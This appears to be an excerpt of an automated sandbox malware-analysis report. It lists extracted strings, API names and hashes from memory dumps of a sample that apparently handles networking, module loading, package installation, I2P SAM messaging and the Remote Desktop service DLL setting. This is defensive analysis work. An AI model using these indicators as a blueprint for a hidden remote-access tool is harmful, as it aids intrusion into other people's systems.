                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158876338.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Startupfflushfwrite
                                                                                                                                                  • String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158876338.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Sleep
                                                                                                                                                  • String ID: /$[W] (%s) -> Not a valid event received(size=%u,suid=%llx,packed_event_sz=%u,event_sz=%u)$[W] (%s) -> Not a valid packet received(size=%u,suid=%llx)$routine_rx
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strlen$HandleModule_mbscpy
                                                                                                                                                  • String ID: [E] (%s) -> Failed(pkg_path=%s,tgt_path=%s,err=%08x)$[I] (%s) -> Done(pkg_path=%s,tgt_path=%s)$package_install$service
                                                                                                                                                  APIs
                                                                                                                                                  • GetProcAddress.KERNEL32(?,?,00000000,000002234F5413D0,?,00007FF6BE03941F), ref: 00007FF6BE031633
                                                                                                                                                  • GetLastError.KERNEL32(?,?,00000000,000002234F5413D0,?,00007FF6BE03941F), ref: 00007FF6BE031666
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressErrorLastProcfflushfwrite
                                                                                                                                                  • String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158369804.00007FF8BA4F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA4F0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8ba4f0000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressErrorLastProcfflushfwrite
                                                                                                                                                  • String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158112398.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressErrorLastProcfflushfwrite
                                                                                                                                                  • String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158250572.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressErrorLastProcfflushfwrite
                                                                                                                                                  • String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
                                                                                                                                                  • API String ID: 1224403792-3063791425
                                                                                                                                                  • Opcode ID: 7b9909d9e40ec3fb382d97b107a8795d681622530cbf96aad0c3b5d9fcd7d944
                                                                                                                                                  • Instruction ID: 2d8d8db9d16b8e6589db55cf7037a1ec71be57f06d158bcd65a6be841bdbc603
                                                                                                                                                  • Opcode Fuzzy Hash: 7b9909d9e40ec3fb382d97b107a8795d681622530cbf96aad0c3b5d9fcd7d944
                                                                                                                                                  • Instruction Fuzzy Hash: E5F0D191A086C3A2FA028F8DE8402B563526F04BD4F15C031CE4D4B799FE2CEA47B310
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158634294.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressErrorLastProcfflushfwrite
                                                                                                                                                  • String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
                                                                                                                                                  • API String ID: 1224403792-3063791425
                                                                                                                                                  • Opcode ID: 27f23b630b3fee3274bf3a028bcd2db1b972005ed87ce814cecee143b722bf30
                                                                                                                                                  • Instruction ID: fae7ac3dbad79c597fe4d217e641ad54cc7271e936c11fb84b882320d7f2aae3
                                                                                                                                                  • Opcode Fuzzy Hash: 27f23b630b3fee3274bf3a028bcd2db1b972005ed87ce814cecee143b722bf30
                                                                                                                                                  • Instruction Fuzzy Hash: 8FF08CA0A0A747A2FE11AB8DFC101AAB3116F14BC4F084131DF4D4BFA9EE3CE5968304
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158508770.00007FF8BFB31000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFB30000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb30000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressErrorLastProcfflushfwrite
                                                                                                                                                  • String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
                                                                                                                                                  • API String ID: 1224403792-3063791425
                                                                                                                                                  • Opcode ID: 872c14c2b4ad4861cf5742ee842d8f6257a05eca4937ccb7efe48da9e016fe22
                                                                                                                                                  • Instruction ID: 06c13dcead6e9b31be2c21aa9eb28e2dc52454428e79bb9edf8f14a4d1efa9ee
                                                                                                                                                  • Opcode Fuzzy Hash: 872c14c2b4ad4861cf5742ee842d8f6257a05eca4937ccb7efe48da9e016fe22
                                                                                                                                                  • Instruction Fuzzy Hash: 44F0F451B8C70752FA01ABCEA9011B5A3266F04BC0F2C4132CF5C0B799EE2CE5469300
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158876338.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressErrorLastProcfflushfwrite
                                                                                                                                                  • String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
                                                                                                                                                  • API String ID: 1224403792-3063791425
                                                                                                                                                  • Opcode ID: 68bf0edd847036089264eecb137d1ff2ce4657a0f68d27ac68f5b67825259f4b
                                                                                                                                                  • Instruction ID: 9f70e605161bd8623a0eaa56368520d6a4881b57f18ce1d1a9cb370e472f958a
                                                                                                                                                  • Opcode Fuzzy Hash: 68bf0edd847036089264eecb137d1ff2ce4657a0f68d27ac68f5b67825259f4b
                                                                                                                                                  • Instruction Fuzzy Hash: C0F08190A4E60781FA159BDDBC045B563916F84BD4F089131DE5D4B7A9EF2CE546C300
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158369804.00007FF8BA4F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA4F0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8ba4f0000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastLibraryLoadfflushfwrite
                                                                                                                                                  • String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
                                                                                                                                                  • API String ID: 4085810780-3386190286
                                                                                                                                                  • Opcode ID: fd51d1cbaee2ddb6301145fafeb239ad102a1964c430bb25295e8db6dcc54a2a
                                                                                                                                                  • Instruction ID: 7961175255b25e872bfb882bcbf3620712fc018bd39c3463f9808b669941953f
                                                                                                                                                  • Opcode Fuzzy Hash: fd51d1cbaee2ddb6301145fafeb239ad102a1964c430bb25295e8db6dcc54a2a
                                                                                                                                                  • Instruction Fuzzy Hash: DCF05E10E0EA07D8FD21ABAEBC804B12290AF06BC4F4865B5CF0D57365EF1DA68AC300
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158112398.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastLibraryLoadfflushfwrite
                                                                                                                                                  • String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
                                                                                                                                                  • API String ID: 4085810780-3386190286
                                                                                                                                                  • Opcode ID: 9d72b4fa98c9842228753628f205ac3672df276f9da1b1e84b80ddd4ff2c3b68
                                                                                                                                                  • Instruction ID: d989370117e27ff442e7930c8d3286487e26d7d20239ba50bff6a1dc5269743b
                                                                                                                                                  • Opcode Fuzzy Hash: 9d72b4fa98c9842228753628f205ac3672df276f9da1b1e84b80ddd4ff2c3b68
                                                                                                                                                  • Instruction Fuzzy Hash: 63F0BE64E0AAD741FA43AF5EE8104B422806F08BC4F499432DE0C96B56EE1CB585E300
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158250572.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastLibraryLoadfflushfwrite
                                                                                                                                                  • String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
                                                                                                                                                  • API String ID: 4085810780-3386190286
                                                                                                                                                  • Opcode ID: eb8e6a62fdbad73e6668c39471aa49a82b9171855985ab7e5bfeb5c52a358f98
                                                                                                                                                  • Instruction ID: fd222b74897f9dbe6fd12d064a1908f727ff3ae57ed5dd56cba605782f16bda5
                                                                                                                                                  • Opcode Fuzzy Hash: eb8e6a62fdbad73e6668c39471aa49a82b9171855985ab7e5bfeb5c52a358f98
                                                                                                                                                  • Instruction Fuzzy Hash: 06F08251E096C751FD569F9EE8805F022519F05BD4F498531CF0C57756FD1CA987B310
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158634294.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastLibraryLoadfflushfwrite
                                                                                                                                                  • String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158508770.00007FF8BFB31000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFB30000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb30000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastLibraryLoadfflushfwrite
                                                                                                                                                  • String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158876338.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastLibraryLoadfflushfwrite
                                                                                                                                                  • String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158876338.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastfflushfwriteshutdown
                                                                                                                                                  • String ID: [D] (%s) -> Done(sock=0x%llx)$[E] (%s) -> shutdown failed(sock=0x%llx,chan=%d,WSAgle=%d)$sock_shutdown
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158876338.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastclosesocketfflushfwrite
                                                                                                                                                  • String ID: [D] (%s) -> Done(sock=0x%llx)$[E] (%s) -> closesocket failed(sock=0x%llx,WSAgle=%d)$sock_close
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158250572.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Openstrcmpstrlen
                                                                                                                                                  • String ID: SYSTEM\CurrentControlSet\Services\TermService\Parameters$ServiceDll$termsrv.dll
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158369804.00007FF8BA4F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA4F0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8ba4f0000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastfflushfwriteioctlsocket
                                                                                                                                                  • String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158112398.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastfflushfwriteioctlsocket
                                                                                                                                                  • String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158250572.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158234398.00007FF8B9180000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158275451.00007FF8B9196000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158294860.00007FF8B91A0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158311467.00007FF8B91A3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158327489.00007FF8B91A4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
Similarity
• API ID: ErrorLastfflushfwriteioctlsocket
• String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
• API String ID: 325303940-110789774
Memory Dump Source
• Source File: 00000016.00000002.3158634294.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
Similarity
• API ID: ErrorLastfflushfwriteioctlsocket
• String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
• API String ID: 325303940-110789774
Memory Dump Source
• Source File: 00000016.00000002.3158508770.00007FF8BFB31000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFB30000, based on PE: true
Similarity
• API ID: ErrorLastfflushfwriteioctlsocket
• String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
• API String ID: 325303940-110789774
Memory Dump Source
• Source File: 00000016.00000002.3158876338.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
Similarity
• API ID: ErrorLastfflushfwriteioctlsocket
• String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
• API String ID: 325303940-110789774
Memory Dump Source
• Source File: 00000016.00000002.3158369804.00007FF8BA4F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA4F0000, based on PE: true
Similarity
• API ID: ErrorLastsetsockopt
• String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
• API String ID: 1729277954-3534120083
Memory Dump Source
• Source File: 00000016.00000002.3158112398.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
Similarity
• API ID: ErrorLastsetsockopt
• String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
• API String ID: 1729277954-3534120083
Memory Dump Source
• Source File: 00000016.00000002.3158250572.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
Similarity
• API ID: ErrorLastsetsockopt
• String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
• API String ID: 1729277954-3534120083
Memory Dump Source
• Source File: 00000016.00000002.3158634294.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastsetsockopt
                                                                                                                                                  • String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
                                                                                                                                                  • API String ID: 1729277954-3534120083
                                                                                                                                                  • Opcode ID: 7cb9fb6779b5c95c1cc7d7e2f9da55888ed15e20daf20baedfc529e281c235e6
                                                                                                                                                  • Instruction ID: f9b76121b091e8bf4ddbd983e265edd573ea8f91927c2e3b0d11004730f14cfc
                                                                                                                                                  • Opcode Fuzzy Hash: 7cb9fb6779b5c95c1cc7d7e2f9da55888ed15e20daf20baedfc529e281c235e6
                                                                                                                                                  • Instruction Fuzzy Hash: 84F09661A0915296F7105F9DF8005A67760BB947D4F004231EF5D83BD4DF7CE545CB00
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158508770.00007FF8BFB31000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFB30000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb30000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastsetsockopt
                                                                                                                                                  • String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
                                                                                                                                                  • API String ID: 1729277954-3534120083
                                                                                                                                                  • Opcode ID: fd868c65be3afd4cf4706a3199d6f8f6826288c199685166dd3a51f61f000229
                                                                                                                                                  • Instruction ID: 48e0b97805db318802c7b9c02ab2419cece9deaf6ed4153e05c001858732126a
                                                                                                                                                  • Opcode Fuzzy Hash: fd868c65be3afd4cf4706a3199d6f8f6826288c199685166dd3a51f61f000229
                                                                                                                                                  • Instruction Fuzzy Hash: 9FF09661A4810346E310AFADB8405A56765BB847D4F508235EF6D837E4DE7CD949D700
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158876338.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastsetsockopt
                                                                                                                                                  • String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
                                                                                                                                                  • API String ID: 1729277954-3534120083
                                                                                                                                                  • Opcode ID: 0437d92ffc93275b6e345f4410a481b5b83083ff933dd21acdf64e7b0c4e13cb
                                                                                                                                                  • Instruction ID: f8c01f93cc01feef4ef4e5cdb77bf74c3f573cb8a8c31f01d5d49b07241c880e
                                                                                                                                                  • Opcode Fuzzy Hash: 0437d92ffc93275b6e345f4410a481b5b83083ff933dd21acdf64e7b0c4e13cb
                                                                                                                                                  • Instruction Fuzzy Hash: CFF09661A0D15286F3105FADF8046B66760ABC47D4F048235EE6D83795DF7CD949CB00
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158876338.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastsetsockopt
                                                                                                                                                  • String ID: [E] (%s) -> setsockopt(SO_KEEPALIVE) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_keepalive
                                                                                                                                                  • API String ID: 1729277954-536111009
                                                                                                                                                  • Opcode ID: efdd2f4e0631f6d227b78a496f5860539d083fedbc232eec6b79c452b0d326fa
                                                                                                                                                  • Instruction ID: e0035c0396eadf7912557962a66d3eae1d985f310ec7c81925add4ad04bb38ab
                                                                                                                                                  • Opcode Fuzzy Hash: efdd2f4e0631f6d227b78a496f5860539d083fedbc232eec6b79c452b0d326fa
                                                                                                                                                  • Instruction Fuzzy Hash: 57F09061A0854286E3109FAEF8005756760AB887D4F10C331EA6D837A4DE3CD50ACB00
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158876338.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: memsetstrchr
                                                                                                                                                  • String ID: [D] (%s) -> %s$sam3_recv_rsp
                                                                                                                                                  • API String ID: 2564583029-4292814133
                                                                                                                                                  • Opcode ID: 6054bc854355412dd534d9800395cb815e31de645798f9446980f867bb94e619
                                                                                                                                                  • Instruction ID: 471846009eb15f8d0148469fee1f802491f413c298e58b7d902158506ede7860
                                                                                                                                                  • Opcode Fuzzy Hash: 6054bc854355412dd534d9800395cb815e31de645798f9446980f867bb94e619
                                                                                                                                                  • Instruction Fuzzy Hash: CA215122F0C55242FE2155ED68147B867404F82FF0F688331EF7D8A7D6DE1CA842D201
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  • [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x), xrefs: 00007FF8BA4F1811
                                                                                                                                                  • ebus_dispatch, xrefs: 00007FF8BA4F180A
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158369804.00007FF8BA4F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA4F0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8ba4f0000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                  • String ID: [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x)$ebus_dispatch
                                                                                                                                                  • API String ID: 3168844106-1717220914
                                                                                                                                                  • Opcode ID: 8e0882bfb16548fdbf9dfd9db4ecb549daa1a64d832ac2d375aca87d32d6b52b
                                                                                                                                                  • Instruction ID: eca0ce0b99744f2f8c43a8dff48bf8f54c361dace6abfb9524bbc3a63872c1fe
                                                                                                                                                  • Opcode Fuzzy Hash: 8e0882bfb16548fdbf9dfd9db4ecb549daa1a64d832ac2d375aca87d32d6b52b
                                                                                                                                                  • Instruction Fuzzy Hash: 25217C32A0CB42C1EB208F5DE880169A3A0FB56BD4B145176DF4D877A4DF3CD941C700
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  • ebus_dispatch, xrefs: 00007FF8B915180A
                                                                                                                                                  • [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x), xrefs: 00007FF8B9151811
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158112398.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                  • String ID: [D] (%s) -> Done(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s),td=%lld,err=%08x)$ebus_dispatch
                                                                                                                                                  • API String ID: 3168844106-1717220914
                                                                                                                                                  • Opcode ID: f8d29101610d8f76ac1ed4feefd51e892c0e55ef3eadb0d75f62bac78426d285
                                                                                                                                                  • Instruction ID: 90a9f288c0f04b3fdc422082309e99f4dc68bd75de7765265834ecdc89b1abc8
